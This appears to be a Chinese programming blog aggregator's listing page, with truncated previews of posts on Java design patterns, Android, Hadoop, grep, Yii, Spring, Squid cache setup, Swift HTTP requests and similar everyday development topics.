    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /** * 业务逻辑:项目经理只能处理500以下的费用申请,部门经理是1000,总经理不设限。简单起见,只同意“Tom”的申请 * bylijinnan */ abstract class Handler { /*
  • Android中启动外部程序 cherishLC android
    1、启动外部程序 引用自: http://blog.csdn.net/linxcool/article/details/7692374 //方法一 Intent intent=new Intent(); //包名 包名+类名(全路径) intent.setClassName("com.linxcool", "com.linxcool.PlaneActi
  • summary_keep_rate coollyj SUM
    BEGIN /*DECLARE minDate varchar(20) ; DECLARE maxDate varchar(20) ;*/ DECLARE stkDate varchar(20) ; DECLARE done int default -1; /* 游标中 注册服务器地址 */ DE
  • hadoop hdfs 添加数据目录出错 daizj hadoophdfs扩容
    由于原来配置的hadoop data目录快要用满了,故准备修改配置文件增加数据目录,以便扩容,但由于疏忽,把core-site.xml, hdfs-site.xml配置文件dfs.datanode.data.dir 配置项增加了配置目录,但未创建实际目录,重启datanode服务时,报如下错误: 2014-11-18 08:51:39,128 WARN org.apache.hadoop.h
  • grep 目录级联查找 dongwei_6688 grep
           在Mac或者Linux下使用grep进行文件内容查找时,如果给定的目标搜索路径是当前目录,那么它默认只搜索当前目录下的文件,而不会搜索其下面子目录中的文件内容,如果想级联搜索下级目录,需要使用一个“-r”参数: grep -n -r "GET" .   上面的命令将会找出当前目录“.”及当前目录中所有下级目录
  • yii 修改模块使用的布局文件 dcj3sjt126com yiilayouts
    方法一:yii模块默认使用系统当前的主题布局文件,如果在主配置文件中配置了主题比如: 'theme'=>'mythm', 那么yii的模块就使用 protected/themes/mythm/views/layouts 下的布局文件; 如果未配置主题,那么 yii的模块就使用  protected/views/layouts 下的布局文件, 总之默认不是使用自身目录 pr
  • 设计模式之单例模式 come_for_dream 设计模式单例模式懒汉式饿汉式双重检验锁失败无序写入
                    今天该来的面试还没来,这个店估计不会来电话了,安静下来写写博客也不错,没事翻了翻小易哥的博客甚至与大牛们之间的差距,基础知识不扎实建起来的楼再高也只能是危楼罢了,陈下心回归基础把以前学过的东西总结一下。   *********************************
  • 8、数组 豆豆咖啡 二维数组数组一维数组
      一、概念       数组是同一种类型数据的集合。其实数组就是一个容器。   二、好处       可以自动给数组中的元素从0开始编号,方便操作这些元素   三、格式   //一维数组 1,元素类型[] 变量名 = new 元素类型[元素的个数] int[] arr =
  • Decode Ways hcx2013 decode
    A message containing letters from A-Z is being encoded to numbers using the following mapping: 'A' -> 1 'B' -> 2 ... 'Z' -> 26 Given an encoded message containing digits, det
  • Spring4.1新特性——异步调度和事件机制的异常处理 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • squid3(高命中率)缓存服务器配置 liyonghui160com
        系统:centos 5.x   需要的软件:squid-3.0.STABLE25.tar.gz 1.下载squid wget http://www.squid-cache.org/Versions/v3/3.0/squid-3.0.STABLE25.tar.gz tar zxf squid-3.0.STABLE25.tar.gz &&
  • 避免Java应用中NullPointerException的技巧和最佳实践 pda158 java
    1) 从已知的String对象中调用equals()和equalsIgnoreCase()方法,而非未知对象。   总是从已知的非空String对象中调用equals()方法。因为equals()方法是对称的,调用a.equals(b)和调用b.equals(a)是完全相同的,这也是为什么程序员对于对象a和b这么不上心。如果调用者是空指针,这种调用可能导致一个空指针异常 Object unk
  • 如何在Swift语言中创建http请求 shoothao httpswift
    概述:本文通过实例从同步和异步两种方式上回答了”如何在Swift语言中创建http请求“的问题。 如果你对Objective-C比较了解的话,对于如何创建http请求你一定驾轻就熟了,而新语言Swift与其相比只有语法上的区别。但是,对才接触到这个崭新平台的初学者来说,他们仍然想知道“如何在Swift语言中创建http请求?”。 在这里,我将作出一些建议来回答上述问题。常见的
  • Spring事务的传播方式 uule spring事务
    传播方式:        新建事务       required       required_new   - 挂起当前         非事务方式运行       supports   &nbs
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他